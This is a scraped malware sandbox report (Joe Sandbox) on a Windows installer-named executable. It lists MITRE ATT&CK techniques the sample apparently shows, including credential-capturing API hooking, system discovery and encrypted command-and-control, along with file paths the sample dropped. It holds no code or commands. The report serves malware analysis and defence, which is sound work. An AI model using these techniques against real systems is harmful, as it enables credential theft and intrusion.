Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\mm3ujg\log.src

C:\Program Files (x86)\mm3ujg\mm3ujg.exe

C:\Program Files (x86)\mm3ujg\tbcore3U.dll

C:\Program Files (x86)\mm3ujg\utils.vcxproj

C:\Program Files (x86)\rXFCwD1I\log.src

C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe

C:\Program Files (x86)\rXFCwD1I\tbcore3U.dll

C:\Program Files (x86)\rXFCwD1I\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Windows Analysis Report
T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre